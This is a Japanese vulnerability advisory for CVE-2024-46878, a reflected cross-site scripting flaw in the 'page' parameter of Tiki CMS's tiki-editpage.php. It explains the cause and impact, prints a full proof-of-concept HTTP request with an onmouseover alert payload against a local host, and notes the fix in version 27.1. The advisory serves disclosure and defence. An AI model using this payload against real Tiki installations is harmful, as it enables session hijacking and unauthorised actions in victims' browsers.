
CVE-2024-46878 - Tiki CMS 反射型クロスサイトスクリプティング (XSS) 脆弱性
Tiki CMS - 'page' パラメータの反射型クロスサイトスクリプティング (XSS) の脆弱性
教育、研究、および防御目的のみに使用を意図しています。許可なくシステムに対して不正に使用することは違法です。
Tiki バージョン 26.3 以前の tiki-editpage.php の page パラメータには、反射型クロスサイトスクリプティング (XSS) の脆弱性が存在します。この脆弱性により、攻撃者は巧妙に細工したペイロードを介して任意の JavaScript コードを実行でき、機密情報へのアクセスや不正な操作が行われる可能性があります。
この脆弱性は、tiki-editpage.php 内の page パラメータの入力サニタイズ処理が不適切であることに起因します。ユーザーが入力したデータが十分なエンコーディングなしに HTTP レスポンスに反映されるため、注入された JavaScript が実行されます。
認証された攻撃者が、巧妙に細工されたリクエストを介して別のユーザーのブラウザで任意の JavaScript を実行できるようになり、セッションハイジャックや不正な操作につながる可能性があります。
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

この問題は、Tiki CMS Groupware バージョン 27.1 で対処されました。ユーザーは、このバージョンまたはそれ以降のパッチ適用版リリースにアップグレードすることをお勧めします。